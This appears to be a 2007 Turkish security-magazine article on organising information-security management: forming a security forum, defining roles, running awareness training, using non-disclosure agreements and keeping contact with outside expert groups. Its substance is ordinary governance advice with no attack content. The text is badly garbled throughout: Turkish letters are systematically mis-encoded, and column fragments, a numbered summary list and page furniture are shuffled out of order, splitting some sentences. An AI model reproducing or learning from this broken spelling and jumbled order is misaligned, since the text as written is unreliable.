gerçeklefltirilse de, fark›ndal›k e¤itimleri ve di¤er bilgilendirici mesajlar (email ve di¤er kurumsal iletiflim araçlar›) bu amaçla kullan›labillir. Bilgi güvenli¤i politikas›n›n onaylanmas› ve yay›nlanmas› kadar güncel kalmas› ve gözden geçirilmesi de üst yönetim sorumluluklar› aras›nda yer al›r. Bu say›da detayland›rmayacak olsak da üst yönetimin önemli görevlerinden biri de gerekli ifl gücü ve kaynaklar› “Bilgi Güvenli¤i Yönetim Sistemi” için ay›rmakt›r. Üst yönetim tek bafl›na Bilgi Güvenli¤i Yönetim Sistemi’nin koordinasyonunu üstlenemez. Bu yüzden kurum içindeki tüm ilgili departman temsilcilerinden oluflan bir “Bilgi Güvenli¤i Forumu” (BGF) (‹sim önemli de¤il, ifllevi ayn› oldu¤u sürece herhangi bir isim kullanmak mümkün.) kurulmal›d›r. BGF üyeleri, farkl› departmanlardan ve süreç sahiplerinden oluflur. Genellikle bilgi güvenli¤i kapsam›nda yer alan tüm bölümlerin ve kapsamda yer almasa bile Bilgi ‹fllem, ‹dari ‹fller gibi destek süreçleri temsilcilerinden oluflur. Bilgi güvenli¤inin kurum içinde koordinasyonu birçok kiflinin birlikte hareket etmesi ile mümkündür. Bu amaçla düzenlenen bilgi güvenli¤i politika beyannamesine ek olarak, görev ve sorumluluklar›n tan›mlanmas› gereklidir. Görev ve sorumluluklar sadece bilgi güvenli¤i forum üyelerinin çal›flmalar›n› de¤il, BGYS ile ilgili tüm tam zamanl›, yar› zamanl› ve d›fl kaynak personelini düzenlemeyi de içine almal›d›r. Burada bahsi geçen görev ve sorumluluklar sadece “bilgiyi korumal›” gibi genel beklentileri de¤il, bilgi güvenli¤i süreçlerinin çal›flmas›n› sa¤layacak “de¤iflim yönetimi”, “olay yönetimi” gibi temel süreçler içinde bireylerin görev ve sorumluluklar›n› da içermelidir. ‹kinci Beyaz fiapka say›s›na gönderdi¤im yaz›da Bilgi güvenli¤inin üç ana bacak üzerinde yükseldi¤ini ve bu bacaklar›n eflit güçte olmalar› ile dengeli ve sa¤lam bir yap› kurulabilece¤ini anlatm›flt›m. Teknoloji, Süreç ve ‹nsan. Teknolojinin getirdiklerini de¤erlendiremiyorsak, yap›n›n düzgün çal›flmas› için gerekli süreçleri devreye alam›yorsak ya da çal›flanlar›m›z görev ve sorumluluklar›n›n bilincinde de¤illerse bilgi güvenli¤inin kal›c›l›¤›ndan bahsetmek do¤ru olmaz. Bu yaz›da da insanlarla ilgili koordinasyon ve organizasyonu ele ald›¤›m›za göre, kiflilere görev ve sorumluluklar›n iyi anlat›lmas›n› sa¤layacak, bu konudaki “fark›ndal›k”lar›n› art›racak çal›flmalar›n önemini vurgulamak gerekli. Basit bir s›n›f e¤itiminden kapsaml› bir ESAM çal›flmas›na kadar yap›labilecekler oldukça genifl bir yelpazeye da¤›l›yor. Ancak önemli olan sadece e¤itim yapmak de¤il, süreklili¤ini sa¤larken baflar›s›n› da ölçecek altyap›y› kurmak ve takip etmektir. Hem kurum içindeki çal›flanlar, hem d›flar›dan gelen dan›flmanlar, d›fl kaynak personeli hem de tedarikciler (ve hatta müflteriler) bilgi varl›klar›na iflleri do¤rultusuna eriflebilirler ve eriflmeliler. Ancak bu varl›klar› korumak için sorumlu olduklar›n›n vurgulanmas› önemlidir. Gizlilik anlaflmalar› (non-disclosure agreement) bu amaçla yap›l›r. Hatta ABD’deki silikon vadisinde rakip firmalarda çal›flanlar›n, hatta çiftlerin, akflam yemekleri öncesinde içki ile a¤›zlar›ndan kaç›rabilecekleri s›rlar› korumak için birbirlerine gizlilik anlaflmalar› imzalatt›klar› söylenir. Gizlilik anlaflmalar› bir kurum için standart maddelerden oluflmal›d›r. Bu farkl› anlaflmalarda hukuk, ilgili tüm gruplar›n iflini kolaylaflt›r›r. Bu maddeler herhangi bir anlaflman›n içine eklenebilecekleri gibi, tek bafl›na bir doküman olarak da haz›rlan›p imzalanabilir. itfaiye birimlerini kuruyorlar, yine de uzmanl›k görüflü için bölgesel itfaiye birimlerinden düzenli yard›m al›yorlarsa; bilgi güvenli¤i konusunda da benzer bir çaban›n gösterilmesi oldukça yararl›d›r. Bu amaçla ilk yap›lmas› gereken, kimlerle ba¤lant›ya geçilece¤inin tespit edilmesidir. Kapsam içindeki varl›klar›n incelenmesi, farkl› varl›k türleri, iflletim sistemleri, fiziksel riskler vb. s›ralanmal›d›r. Bu liste genellikle fiziksel güvenlik için güvenlik güçleri, belediye, itfaiye ve sa¤l›k hizmetlerini; bilgi ifllem konusunda üretici firmalar› ve genel bilgi güvenli¤i ile ilgili olarak da SANS.org ve BilgiGuvenligi.org gibi organizasyonlar› içerir. Daha sonra kurum içinde görev tan›m›nda belirtilmifl kifliler ve gruplar kendi sorumluluk/ilgi alanlar›na göre hangi yöntemle düzenli bilgi al›flverifli içinde bulunabildiklerini belirlerler. Teknolojiye yak›n konular genellikle RSS ve e-posta gruplar› gibi ‹nternet tabanl› çözümleri seçerken, hukuk, devlet gibi ba¤lant›lar dönemsel toplant›lar fleklinde gerçekleflebilir. Afla¤›da bu yazd›klar›m›z›n k›sa bir özeti yer almakta. Bu yaz›da bilgi güvenli¤i yönetim sistemi kurulufl, iflletim ve ilerletme aflamalar›nda önemli bir konuyu detayland›rmaya çal›flt›m. Önümüzdeki say›da görüflmek üzere, güvenli günler. *Bilgi güvenli¤inin koordinasyonu için gerçeklefltirilmesi gerekenler: 1. Bilgi Güvenli¤i Forumu (BGF) kurulmas› 2. Bilgi Güvenli¤i (ve BGF) görev ve sorumluluklar›n›n tan›mlanmas› ‹lgili anlaflma metinlerinin haz›rlanmas› ve güncel tutulmas› kadar kimlerle ne zaman imzaland›¤›, nerede arflivlendi¤i gibi kay›t bilgilerinin de tutulmas› önemlidir. Bu takibin zorlu¤u nedeniyle bugün bir çok büyük kurum, benim de destekledi¤im uygulamayla; arflivlerle u¤raflmak yerine, her f›rsatta ayn› kiflilere bile benzer metni imzalama flart› getiriyorlar. Fark›ndal›k çal›flmalar›na da yard›mc› olan bu durum d›flar›dan gelen kiflilerin kurum bilgi güvenli¤i kurallar›n› hat›rlamalar›na ve özen göstermelerine de neden oluyor. 3. Bilgi Güvenli¤i fark›ndal›k çal›flmalar›n›n bafllat›lmas›/sürdürülmesi Bilgi güvenli¤inin kapal› bir kutu gibi, kurum içindeki bilgi ile sa¤lanmas› oldukça güç. Nas›l büyük fabrikalar kendi *Bu liste örnektir. Her kurum kendi kültürüne uygun çözümü gelifltirmelidir. 4. Güncel gizlilik anlaflma taslaklar›n›n haz›rlanmas›, ilgililere imzalat›lmas› ve takip edilmesi 5. Kulland›¤›m›z teknoloji ve bulundu¤umuz sektörle ilgili uzman gruplarla düzenli iletiflimin kurulmas› Bilgi Güvenli¤i’nin Organizasyonu ve Koordinasyonu 28 beyazflapka A¤ustos 2007 A¤ustos 2007 beyazflapka 29 Agu’07 eskiz-6 7/31/07 12:35 AM Page 16 Bilgi Güvenli¤i Uzmanları ve Bilgi ‹fllem Yöneticilerinin güvenlik platformu Beyaz fiapka Dergisi, 7. say›ya ulaflt›. Bilgi Güvenli¤i alan›nda her geçen gün artan geliflmeleri yetkin a¤›zlardan takip etmek için ücretsiz abone olun. www.beyazsapka.org